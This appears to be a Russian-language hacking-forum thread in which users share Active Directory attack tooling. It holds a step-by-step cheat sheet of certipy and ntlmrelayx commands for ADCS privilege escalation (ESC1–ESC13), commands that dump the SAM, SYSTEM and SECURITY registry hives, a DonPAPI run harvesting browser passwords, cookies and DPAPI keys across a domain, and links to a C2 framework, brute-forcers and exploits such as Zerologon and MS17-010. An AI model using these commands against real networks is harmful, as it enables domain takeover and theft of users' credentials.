Утилиты для работы в сетях

[student]

Поиск PKI Enrollment Services и шаблонов сертификатов в Active Directory

• Команда для поиска через LDAP:
  Код:
  nxc ldap ip -u username -p password -M adcs

Использование Certipy

• 1. Поиск уязвимых шаблонов сертификатов:
  Код:
  certipy find -u username -p password -dc-ip ip -vulnerable -enabled
• 2. Список CA, серверов и поиск уязвимых шаблонов:
  Код:
  certipy find -u username -p password -dc-ip ip -dns-tcp -ns ip -debug

Использование Certify

• Поиск уязвимых шаблонов сертификатов:
  Код:
  Certify.exe find /vulnerable

Типовые атаки на Active Directory Certificate Services

• ESC1:
  1. Создание нового имени компьютера:
     Код:
     addcomputer.py domain/username:password -computer-name computer_name -computer-pass computer_password
  2. Использование права пользователя на создание запроса с пользовательским SAN:
     Код:
     certipy req -u computer_name -p computer_password -ca ca -target domain -template template -upn administrator@domain -dns domain -dc-ip ip
  3. Аутентификация с сертификатом и получение NT-хэша администратора:
     Код:
     certipy auth -pfx pfx_file -domain domain -username username -dc-ip ip
• ESC3:
  1. Запрос сертификата:
     Код:
     certipy req -username username -password password -ca ca -target domain -template template
  2. Запрос от имени другого пользователя:
     Код:
     certipy req -username username -password password -ca ca -target domain -template User -on-behalf-of 'domain\administrator' -pfx pfx_file
  3. Аутентификация как администратор:
     Код:
     certipy auth -pfx administrator.pfx -dc-ip ip
• ESC4:
  1. Изменение конфигурации шаблона сертификата, делая его уязвимым:
     Код:
     certipy template -username username -password password -template template -save-old -dc-ip ip
  2. Проверка уязвимости сертификата:
     Код:
     certipy find -u username -p password -dc-ip ip -dns-tcp -ns ip -stdout -debug
• ESC6:
  1. Запрос сертификата с использованием UPN:
     Код:
     certipy req -username administrator@domain -password password -ca ca -target domain -template template -upn administrator@domain
• ESC7:
  1. Добавление пользователя в офицеры с правами "Manage Certificates":
     Код:
     certipy ca -ca ca -add-officer username -username username@domain -password password -dc-ip ip -dns-tcp -ns ip
  2. Включение шаблона SubCA:
     Код:
     certipy ca -ca ca -enable-template SubCA -username username@domain -password password -dc-ip ip -dns-tcp -ns ip
• ESC8:
  1. Если сервер ADCS не на контроллере домена и активирован Web Enrollment:
     Код:
     ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server
• ESC9:
  1. Использование команды shadow для целевого аккаунта:
     Код:
     certipy shadow auto -username username@domain -hashes :hash -account target_username
  2. Запрос сертификата с указанным шаблоном:
     Код:
     certipy req -username target_username@domain -hashes :target_hash -ca ca -template template -target $DC_IP
• ESC13:
  1. Создание запроса сертификата с ключом большого размера:
     Код:
     certipy req -u username -p password -ca ca -target domain -template template -dc-ip ip -key-size 4096
  2. Получение TGT через PKINIT:
     Код:
     python3 gettgtpkinit.py -cert-pfx pfx_file domain/username ccache_file -dc-ip ip -v

Полезные ресурсы

• https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ad-cs-abuse
• https://book.hacktricks.xyz/windows...methodology/ad-certificates/domain-escalation
• https://swisskyrepo.github.io/Inter...d-adcs-certificate-services/#adcs-enumeration

Инструменты

• https://github.com/ly4k/Certipy
• https://github.com/GhostPack/Certify

 

[student]

https://github.com/chainreactors/malefic китайский c2 на расте

 

[student]

https://github.com/chainreactors/zombie мощный брут ssh, mssql, mysql

 

[adraosi]

Очень годна статья !

 

[student]

https://github.com/NH-RED-TEAM/RustHound вариация bloodhound на расте, говорят быстрее собирает данные

 

[raspberry]

RS7 сказал(а):
Еще самое главное, чтобы никто не заливал на VT
Нажмите, чтобы раскрыть...

А что так нельзя было что ли!?

 

[raspberry]

student сказал(а):
https://github.com/NH-RED-TEAM/RustHound вариация bloodhound на расте, говорят быстрее собирает данные
Нажмите, чтобы раскрыть...

растахаунд получается.

 

[JingleBenz]

Код:

whoami /priv
whoami /all
whoami /groups
whoami /domain
nltest -dclist
nltest -dsgetdc
tasklist
netstat
wmic /node:""<redacted>"" /user:""<redacted>"" /password:""<redacted>"" process list brief
wmic /node:""<redacted>"" process list brief
wmic process get commandline -all
wmic process <proc_id> get commandline
wmic process where name=""GoogleCrashHandler64.exe"" get commandline,processed
powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties
powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties.memberof
powershell Get-WmiObject -Class Win32_Service -Computername
powershell Get-WindowsDriver -Online -All

Разведка на хосте

 

[JingleBenz]

Код:

reg save HKLM\SYSTEM ""C:\Windows\temp\1\sy.sa"" /y
reg save HKLM\SAM ""C:\Windows\temp\1\sam.sa"" /y
reg save HKLM\SECURITY ""C:\Windows\temp\1\se.sa"" /y
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q

Сохраняем куст с учетками для дальнейшего парсинга локального.

 

[JingleBenz]

Код:

Get-NetComputer
Get-NetGroup
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount"
Get-NetDiDomain
Get-AdUser
Get-DomainUser -UserName
Get-NetUser -PreauthNotRequire
Get-NetComputer | select samaccountname
Get-NetUser -SPN | select serviceprincipalname

сетевая разведка

https://github.com/PowerShellMafia/PowerSploit

 

[JingleBenz]

GitHub - llkat/rsockstun: reverse socks tunneler with ntlm and proxy support ​

reverse socks tunneler with ntlm and proxy support - llkat/rsockstun

github.com
создать socks туннель

 

[raspberry]

JingleBenz сказал(а):
Код:

Get-NetComputer
Get-NetGroup
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount"
Get-NetDiDomain
Get-AdUser
Get-DomainUser -UserName
Get-NetUser -PreauthNotRequire
Get-NetComputer | select samaccountname
Get-NetUser -SPN | select serviceprincipalname

сетевая разведка
Нажмите, чтобы раскрыть...

на таргете должен быть установлен модуль Active Directory Module для Windows PowerShell или я ошибаюсь? Или же данные команды должны быт выполнены в PowerView?

 

[JingleBenz]

raspberry сказал(а):
на таргете должен быть установлен модуль Active Directory Module для Windows PowerShell или я ошибаюсь? Или же данные команды должны быт выполнены в PowerView?
Нажмите, чтобы раскрыть...

https://github.com/PowerShellMafia/PowerSploit вроде оно

 

[raspberry]

JingleBenz сказал(а):
https://github.com/PowerShellMafia/PowerSploit вроде оно
Нажмите, чтобы раскрыть...

оно самое, просто добавьте этот link под "сетевая разведка".

 

[raspberry]

JingleBenz сказал(а):
https://github.com/PowerShellMafia/PowerSploit вроде оно
Нажмите, чтобы раскрыть...

можно еще и вот этот использовать.

GitHub - aniqfakhrul/powerview.py: Just another Powerview alternative but on steroids ​

Just another Powerview alternative but on steroids - aniqfakhrul/powerview.py

github.com

 

[student]

DonPAPI автоматизирует удаленный сброс секретов на несколько компьютеров Windows с учетом возможностей обхода защиты.

• Учетные данные браузера Chromium, файлы cookie и токен обновления Chrome
• Сертификаты Windows
• Менеджер по учетным данным
• Учетные данные и файлы cookie браузера Firefox
• Учетные данные Mobaxterm
• Учетные данные MRemoteNg
• Учетные данные менеджера RDC
• Файлы на рабочем столе и папка «Недавние»
• Учетные данные SCCM
• Учетные данные хранилищ
• Учетные данные VNC
• Учетные данные Wi-Fi

презентация

Соберем все данные от имени домейн админа

pipx run donpapi collect -u domain_admin -p D0m1n4t0r1337 -d CDB.LOCAL -t ALL

Этот лог показывает работу утилиты DonPAPI, которая используется для извлечения чувствительных данных из систем Windows, таких как мастер-ключи DPAPI, учетные записи, сертификаты, пароли и многое другое. Софт проводил сбор данных на двух целевых хостах в домене CDB.LOCAL. Вот подробный разбор того, что происходило.
Спойлер: кликай если не понял лог
DonPAPI обнаружил два хоста:

1. DC-LAB-3.CDB.LOCAL (вероятно, контроллер домена)
2. CLIENT-LAB-3.CDB.LOCAL (рабочая станция клиента)

Этот лог показывает работу утилиты DonPAPI, которая используется для извлечения чувствительных данных из систем Windows, таких как мастер-ключи DPAPI, учетные записи, сертификаты, пароли и многое другое. Софт проводил сбор данных на двух целевых хостах в домене CDB.LOCAL. Вот подробный разбор того, что происходило:

---

1. Начало работы​

• Утилита DonPAPI была запущена с использованием учетных данных доменного администратора:
  css
  Копировать код
  -u domain_admin -p D0m1n4t0r1337 -d CDB.LOCAL -t ALL
  • Цель: собрать все доступные данные с двух систем в домене CDB.LOCAL.

---

2. Обнаружение целей​

• DonPAPI обнаружил два хоста:
  1. DC-LAB-3.CDB.LOCAL (вероятно, контроллер домена)
  2. CLIENT-LAB-3.CDB.LOCAL (рабочая станция клиента)

---

3. Извлечение данных (основные этапы)​

На каждом хосте утилита выполняла определённые действия. Вот их подробный список:

3.1. Извлечение SAM (Security Account Manager)​

• SAMсодержит локальные хэши паролей учетных записей:
  • DC-LAB-3.CDB.LOCAL: найдено 3 учётных записи.
  • CLIENT-LAB-3.CDB.LOCAL: найдено 5 учётных записей

Дамп браузеров​

• Chromium: попытка извлечь пароли и куки.
• Firefox:
  • Извлечены пароли пользователя student
    
    
    

  • Что делал софт?​

    1. Собирал учетные данные:
       • Хэши паролей (SAM).
       • LSA секреты.
       • Хранители учетных данных (Credential Manager).
    2. Извлекал данные DPAPI:
       • Мастер-ключи (для расшифровки зашифрованных данных).
    3. Дампил браузеры:
       • Пароли, куки, сохраненные данные (Chromium, Firefox).
    4. Собирал сертификаты:
       • Пользовательские и машинные сертификаты.
    5. Извлекал конфиденциальные данные из приложений:
       • SSH/доступы (MobaXterm, RDCManager, mRemoteNG, VNC).
    6. Собирал информацию о WiFi:
       • Пароли сохраненных WiFi-сетей.
    7. Собирал файлы:
       • Недавние и рабочие файлы.

креды удобно скачивать следующим образом.

pipx run donpapi gui --port 3333

можете не париться в netexec уже предусмотрена тулза.

 

[Эрмано]

Я канеш знаю, что написанно утилиты, но я не могу не вставить свои пять копеек про эксплойты. Не ну реально, MS17-010 иногда нужен, так что, вот небольшая подборка, так сказать на тупого сис админа:

GitHub - dirkjanm/CVE-2020-1472: PoC for Zerologon - all research credits go to Tom Tervoort of Secura ​

PoC for Zerologon - all research credits go to Tom Tervoort of Secura - dirkjanm/CVE-2020-1472

github.com

GitHub - worawit/MS17-010: MS17-010 ​

MS17-010. Contribute to worawit/MS17-010 development by creating an account on GitHub.

github.com

GitHub - robertdavidgraham/rdpscan: A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability. ​

A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability. - robertdavidgraham/rdpscan

github.com
Ну и metasploit-framework

 

[raspberry]

Эрмано сказал(а):
Я канеш знаю, что написанно утилиты, но я не могу не вставить свои пять копеек про эксплойты. Не ну реально, MS17-010 иногда нужен, так что, вот небольшая подборка, так сказать на тупого сис админа:

GitHub - dirkjanm/CVE-2020-1472: PoC for Zerologon - all research credits go to Tom Tervoort of Secura ​

PoC for Zerologon - all research credits go to Tom Tervoort of Secura - dirkjanm/CVE-2020-1472

github.com

GitHub - worawit/MS17-010: MS17-010 ​

MS17-010. Contribute to worawit/MS17-010 development by creating an account on GitHub.

github.com

GitHub - robertdavidgraham/rdpscan: A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability. ​

A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability. - robertdavidgraham/rdpscan

github.com
Ну и metasploit-framework
Нажмите, чтобы раскрыть...

это должен быть совсем тупой сис админ, что бы деражать в сети хрюшу или 7-ку...

 

[Эрмано]

raspberry сказал(а):
это должен быть совсем тупой сис админ, что бы деражать в сети хрюшу или 7-ку...
Нажмите, чтобы раскрыть...

К сожалению(или к счастью) таких я вижу в умеренном количестве, то 7-ку поставят, то 16 сервер, то 2k8)

 

[raspberry]

Эрмано сказал(а):
К сожалению(или к счастью) таких я вижу в умеренном количестве, то 7-ку поставят, то 16 сервер, то 2k8)
Нажмите, чтобы раскрыть...

ну я тоже такое наблюдаю с переодичностью, но 7-ка уже крайне редко.